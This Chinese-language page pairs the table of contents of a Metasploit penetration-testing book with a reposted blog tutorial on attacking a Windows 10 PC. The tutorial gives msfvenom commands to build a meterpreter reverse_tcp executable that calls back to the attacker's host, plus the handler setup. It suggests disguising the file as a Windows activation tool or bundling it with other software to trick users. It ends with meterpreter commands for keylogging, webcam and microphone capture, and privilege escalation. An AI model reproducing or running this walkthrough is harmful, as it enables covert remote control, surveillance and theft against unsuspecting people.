❶ Metasploit滲透測試魔鬼訓練營的作品目錄
前言致謝第1章魔鬼訓練營——初識Metasploit11.1什麼是滲透測試11.1.1滲透測試的起源與定義11.1.2滲透測試的分類21.1.3滲透測試方法與流程41.1.4滲透測試過程環節51.2漏洞分析與利用61.2.1安全漏洞生命周期71.2.2安全漏洞披露方式81.2.3安全漏洞公共資源庫91.3滲透測試神器Metasploit111.3.1誕生與發展111.3.2滲透測試框架軟體161.3.3漏洞研究與滲透代碼開發平台181.3.4安全技術集成開發與應用環境191.4Metasploit結構剖析201.4.1Metasploit體系框架211.4.2輔助模塊231.4.3滲透攻擊模塊231.4.4攻擊載荷模塊251.4.5空指令模塊261.4.6編碼器模塊261.4.7後滲透攻擊模塊271.5安裝Metasploit軟體281.5.1在Back Track上使用和更新Metasploit291.5.2在Windows操作系統上安裝Metasploit291.5.3在Linux操作系統上安裝Metasploit301.6了解Metasploit的使用介面311.6.1msfgui圖形化界面工具321.6.2msfconsole控制台終端341.6.3msfcli命令行程序361.7小結381.8魔鬼訓練營實踐作業39第2章賽寧VS.定V——滲透測試實驗環境402.1定V公司的網路環境拓撲412.1.1滲透測試實驗環境拓撲結構422.1.2攻擊機環境442.1.3靶機環境452.1.4分析環境502.2滲透測試實驗環境的搭建552.2.1虛擬環境部署562.2.2網路環境配置562.2.3虛擬機鏡像配置572.3小結632.4魔鬼訓練營實踐作業64第3章揭開「戰爭迷霧」——情報搜集技術653.1外圍信息搜集653.1.1通過DNS和IP地址挖掘目標網路信息663.1.2通過搜索引擎進行信息搜集723.1.3對定V公司網路進行外圍信息搜集793.2主機探測與埠掃描803.2.1活躍主機掃描803.2.2操作系統辨識853.2.3埠掃描與服務類型探測863.2.4Back Track 5的Autoscan功能903.2.5探測掃描結果分析913.3服務掃描與查點923.3.1常見的網路服務掃描933.3.2口令猜測與嗅探963.4網路漏洞掃描983.4.1漏洞掃描原理與漏洞掃描器983.4.2OpenVAS漏洞掃描器993.4.3查找特定服務漏洞1083.4.4漏洞掃描結果分析1093.5滲透測試信息資料庫與共享1103.5.1使用滲透測試信息資料庫的優勢1113.5.2Metasploit的資料庫支持1113.5.3在Metasploit中使用PostgreSQL1113.5.4Nmap與滲透測試資料庫1133.5.5OpenVAS與滲透測試資料庫1133.5.6共享你的滲透測試信息資料庫1143.6小結1173.7魔鬼訓練營實踐作業118第4章突破定V門戶——Web應用滲透技術1194.1Web應用滲透技術基礎知識1194.1.1為什麼進行Web應用滲透攻擊1204.1.2Web應用攻擊的發展趨勢1214.1.3OWASP Web漏洞TOP 101224.1.4近期Web應用攻擊典型案例1264.1.5基於Metasploit框架的Web應用滲透技術1284.2Web應用漏洞掃描探測1304.2.1開源Web應用漏洞掃描工具1314.2.2掃描神器W3AF1334.2.3SQL注入漏洞探測1354.2.4XSS漏洞探測1444.2.5Web應用程序漏洞探測1454.3Web應用程序滲透測試1474.3.1SQL注入實例分析1474.3.2跨站攻擊實例分析1584.3.3命令注入實例分析1664.3.4文件包含和文件上傳漏洞1744.4小結1804.5魔鬼訓練營實踐作業180第5章定V門大敞,哥要進內網——網路服務滲透攻擊1825.1內存攻防技術1825.1.1緩沖區溢出漏洞機理1835.1.2棧溢出利用原理1845.1.3堆溢出利用原理1865.1.4緩沖區溢出利用的限制條件1885.1.5攻防兩端的對抗博弈1885.2網路服務滲透攻擊面1905.2.1針對Windows系統自帶的網路服務滲透攻擊1915.2.2針對Windows操作系統上微軟網路服務的滲透攻擊1935.2.3針對Windows操作系統上第三方網路服務的滲透攻擊1945.2.4針對工業控制系統服務軟體的滲透攻擊1945.3Windows服務滲透攻擊實戰案例——MS08-067安全漏洞1965.3.1威名遠揚的超級大漏洞MS08-0671965.3.2MS08-067漏洞滲透攻擊原理及過程1975.3.3MS08-067漏洞滲透攻擊模塊源代碼解析2005.3.4MS08-067安全漏洞機理分析2055.4第三方網路服務滲透攻擊實戰案例——Oracle資料庫2115.4.1Oracle資料庫的「蟻穴」2125.4.2Oracle滲透利用模塊源代碼解析2125.4.3Oracle漏洞滲透攻擊過程2145.4.4Oracle安全漏洞利用機理2205.5工業控制系統服務滲透攻擊實戰案例——亞控科技KingView2225.5.1中國廠商SCADA軟體遭國外黑客盯梢2225.5.2KingView 6.53 HistorySvr滲透攻擊代碼解析2245.5.3KingView 6.53漏洞滲透攻擊測試過程2255.5.4KingView堆溢出安全漏洞原理分析2285.6Linux系統服務滲透攻擊實戰案例——Samba安全漏洞2325.6.1Linux與Windows之間的差異2325.6.2Linux系統服務滲透攻擊原理2335.6.3Samba安全漏洞描述與攻擊模塊解析2345.6.4Samba滲透攻擊過程2355.6.5Samba安全漏洞原理分析2415.7小結2445.8魔鬼訓練營實踐作業244第6章定V網路主宰者——客戶端滲透攻擊2466.1客戶端滲透攻擊基礎知識2466.1.1客戶端滲透攻擊的特點2476.1.2客戶端滲透攻擊的發展和趨勢2476.1.3安全防護機制2486.2針對瀏覽器的滲透攻擊2496.2.1瀏覽器滲透攻擊面2506.2.2堆噴射利用方式2506.2.3MSF中自動化瀏覽器攻擊2516.3瀏覽器滲透攻擊實例——MS11-050安全漏洞2546.3.1MS11-050漏洞滲透攻擊過程2546.3.2MS11-050漏洞滲透攻擊源碼解析與機理分析2566.4第三方插件滲透攻擊實戰案例——再探亞控科技KingView2616.4.1移植KingView滲透攻擊代碼2616.4.2KingView滲透攻擊過程2646.4.3KingView安全漏洞機理分析2656.5針對應用軟體的滲透攻擊2696.5.1應用軟體滲透攻擊機理2696.5.2內存攻擊技術ROP的實現2706.5.3MSF中的自動化fileformat攻擊2766.6針對Office軟體的滲透攻擊實例——MS10-087安全漏洞2766.6.1MS10-087滲透測試過程2776.6.2MS10-087漏洞滲透攻擊模塊源代碼解析2786.6.3MS10-087漏洞原理分析2796.6.4MS10-087漏洞利用原理2826.6.5文件格式分析2846.7Adobe閱讀器滲透攻擊實戰案例——加急的項目進展報告2866.7.1Adobe滲透測試過程2876.7.2Adobe滲透攻擊模塊解析與機理分析2896.7.3Adobe漏洞利用原理2936.8小結2986.9魔鬼訓練營實踐作業299第7章甜言蜜語背後的危險——社會工程學3007.1社會工程學的前世今生3007.1.1什麼是社會工程學攻擊3017.1.2社會工程學攻擊的基本形式3017.1.3社交網站社會工程學攻擊案例3027.2社會工程學技術框架3037.2.1信息搜集3037.2.2誘導3067.2.3托辭3087.2.4心理影響3097.3社會工程學攻擊案例——偽裝木馬3117.3.1偽裝木馬的主要方法與傳播途徑3127.3.2偽裝木馬社會工程學攻擊策劃3137.3.3木馬程序的製作3147.3.4偽裝木馬的「免殺」處理3197.3.5偽裝木馬社會工程學的實施過程3237.3.6偽裝木馬社會工程學攻擊案例總結3257.4針對性社會工程學攻擊案例——網站釣魚3257.4.1社會工程學攻擊工具包SET3257.4.2網站釣魚社會工程學攻擊策劃3257.4.3釣魚網站的製作3267.4.4網站釣魚社會工程學的實施過程3307.4.5網站釣魚社會工程學攻擊案例總結3317.5針對性社會工程學攻擊案例——郵件釣魚3317.5.1郵件釣魚社會工程學攻擊策劃3317.5.2使用SET工具集完成郵件釣魚3327.5.3針對性郵件釣魚社會工程學攻擊案例總結3387.6U盤社會工程學攻擊案例——Hacksaw攻擊3387.6.1U盤社會工程學攻擊策劃3397.6.2U盤攻擊原理3407.6.3製作Hacksaw U盤3417.6.4U盤社會工程學攻擊的實施過程3457.6.5U盤攻擊社會工程學攻擊案例總結3457.7小結3467.8魔鬼訓練營實踐作業346第8章刀無形、劍無影——移動環境滲透測試3488.1移動的Metasploit滲透測試平台3488.1.1什麼是BYOD3488.1.2下載安裝Metasploit3498.1.3在iPad上手動安裝Metasploit3508.2無線網路滲透測試技巧3518.2.1無線網路口令破解3518.2.2破解無線AP的管理密碼3558.2.3無線AP漏洞利用滲透攻擊3608.3無線網路客戶端攻擊案例——上網筆記本電腦3648.3.1配置假冒AP3648.3.2載入karma.rc資源文件3678.3.3移動上網筆記本滲透攻擊實施過程3698.3.4移動上網筆記本滲透攻擊案例總結3718.4移動環境滲透攻擊案例——智能手機3718.4.1BYOD設備的特點3728.4.2蘋果iOS設備滲透攻擊3728.4.3Android智能手機的滲透攻擊3778.4.4Android平台Metasploit滲透攻擊模塊的移植3858.5小結3918.6魔鬼訓練營實踐作業391第9章俘獲定V之心——強大的Meterpreter3939.1再探Metasploit攻擊載荷模塊3939.1.1典型的攻擊載荷模塊3949.1.2如何使用攻擊載荷模塊3959.1.3meterpreter的技術優勢3989.2Meterpreter命令詳解4009.2.1基本命令4019.2.2文件系統命令4029.2.3網路命令4049.2.4系統命令4069.3後滲透攻擊模塊4089.3.1為什麼引入後滲透攻擊模塊4089.3.2各操作系統平台分布情況4099.3.3後滲透攻擊模塊的使用方法4099.4Meterpreter在定V滲透測試中的應用4119.4.1植入後門實施遠程式控制制4119.4.2許可權提升4149.4.3信息竊取4179.4.4口令攫取和利用4199.4.5內網拓展4249.4.6掩蹤滅跡4309.5小結4319.6魔鬼訓練營實踐作業432第10章群狼出山——黑客奪旗競賽實戰43310.1黑客奪旗競賽的由來43410.2讓我們來玩玩「地下產業鏈」43610.2.1「洗錢」的競賽場景分析43710.2.2「洗錢」規則43810.2.3競賽准備與任務分工43910.3CTF競賽現場44110.3.1解題「打黑錢」44110.3.2GameBox掃描與漏洞分析44310.3.3滲透Web應用服務44810.3.4滲透二進制服務程序45110.3.5瘋狂「洗錢」45910.3.6力不從心的防禦45910.4CTF競賽結果46010.5魔鬼訓練營大結局46110.6魔鬼訓練營實踐作業461附錄A如何撰寫滲透測試報告462附錄B參考與進一步閱讀468
❷ Kali利用msf滲透Windows電腦(超詳細)
前言
最近整理了一些 奇安信&華為&深信服大佬 的課件資料+大廠面試課題,想要的可以私信自取, 無償贈送 給粉絲朋友~
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用來生成後門的軟體。
MSFvenom是Msfpayload和Msfencode的組合,將這兩個工具都放在一個Framework實例中。自2015年6月8日起,msfvenom替換了msfpayload和msfencode。
演示環境
使用Kali 2021.3進行演示操作
目標靶機: Win10專業版
軟體:msfvenom、msfconsole(Kali系統內置)
1.進入管理員模式
命令: sudo su
解釋: 不在管理員模式下運行可能會有許可權不夠的提示,為了避免命令執行失敗,在管理員下運行以下命令
命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=本地ip> LPORT=本地埠號> –f exe –o 文件名>.exe
解釋: 本地ip寫自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址
本地埠自己隨便設置一個沒有被佔用的埠號,如果埠號被佔用那麼文件會生成失敗,換一個埠號就性
文件名可以隨便寫自己喜歡的名字,比如寫Win10激活工具,可能更容易讓目標主機上鉤
當然MSF也可以用來滲透手機、mac、Linux等
接下來運行命令生成文件
默認生成的文件在根目錄下
把剛才生成的文件放到目標靶機Win10系統中
命令: msfconsole
(1)命令: use exploit/multi/handler(選擇模塊)
(2)命令: set payload windows/meterpreter/reverse_tcp(選擇攻擊模塊)
(3)命令: set LhOST 192.168.32.1(填寫自己主機的IP地址)
(4)命令: set lport 1111(填寫剛才生成文件時的埠號)
(5)命令: show options(查看設置參數)
(6)命令: exploit -z -j(後台執行)
我們這里也可以把這個程序偽裝一下,把他的圖標改一下,或者把它捆綁在某些軟體上面,當用戶打開就自動安裝到對方電腦上面
(1)命令: sessions (查看上鉤的用戶)
(2)命令: sessions -i 1 (選擇需要攻擊的用戶,這里選擇第 1 個
命令: run vnc -i
cmd指令:
cat 讀取文件內容到屏幕
cd 更改目錄
checksum 檢索文件的校驗和
cp 將源復制到目標
del 刪除指定文件
dir 列出文件(ls 的別名)
下載 下載文件或目錄
編輯 編輯文件
getlwd 列印本地工作目錄
getwd 列印工作目錄
lcd 更改本地工作目錄
lls 列出本地文件
lpwd 列印本地工作目錄
ls 列出文件
mkdir 創建目錄
mv 將源移動到目標
pwd 列印工作目錄
rm 刪除指定文件
rmdir 刪除目錄
search 搜索文件
show_mount 列出所有掛載點/邏輯驅動器
upload 上傳文件或目錄
pkill 按名稱終止進程
keyscan_start 開始捕獲擊鍵(開始鍵盤記錄)
keyscan_mp 轉儲按鍵緩沖(下載鍵盤記錄)
keyscan_stop 停止捕獲擊鍵(停止鍵盤記錄)
record_mic X秒從默認的麥克風record_mic音頻記錄(音頻錄制)
webcam_chat 開始視頻聊天(視頻,對方會有彈窗)
webcam_list 單攝像頭(查看攝像頭列表)
webcam_snap 採取快照從指定的攝像頭(攝像頭拍攝一張照片)
webcam_stream 播放視頻流從指定的攝像頭(開啟攝像頭監控)
enumdesktops 列出所有可訪問的桌面和窗口站(窗體列表)
getdesktop 得到當前的Meterpreter桌面
reboot 重新啟動遠程計算機
shutdown 關閉遠程計算機
shell 放入系統命令 shell
enumdesktops 列出所有可訪問的桌面和窗口站
getdesktop 獲取當前的meterpreter桌面
idletime 返回遠程用戶空閑的秒數
keyboard_send 發送擊鍵
keyevent 發送按鍵事件
keyscan_mp 轉儲擊鍵緩沖區
keyscan_start 開始捕獲擊鍵
keyscan_stop 停止捕獲擊鍵
mouse 發送滑鼠事件
screenshare 實時觀看遠程用戶桌面
screenshot 抓取互動式桌面的屏幕截圖
setdesktop 更改 Meterpreters 當前桌面
uictl 控制一些用戶界面組件
record_mic 從默認麥克風錄制音頻 X 秒
webcam_chat 開始視頻聊天
webcam_list 列出網路攝像頭
webcam_snap 從指定的網路攝像頭拍攝快照
webcam_stream 播放來自指定網路攝像頭的視頻流
play 在目標系統上播放波形音頻文件 (.wav)
getsystem 嘗試將您的許可權提升到本地系統的許可權
execute -f notepad 打開記事本
————————————————
原文鏈接:https://blog.csdn.net/RFZ_322/article/details/123367668